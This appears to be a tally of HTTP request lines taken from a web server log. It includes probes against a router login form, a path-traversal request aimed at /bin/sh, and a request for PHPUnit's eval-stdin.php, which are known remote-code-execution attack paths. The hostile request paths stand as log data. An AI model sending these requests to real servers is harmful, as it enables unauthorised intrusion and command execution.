1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 PRI * HTTP/2.0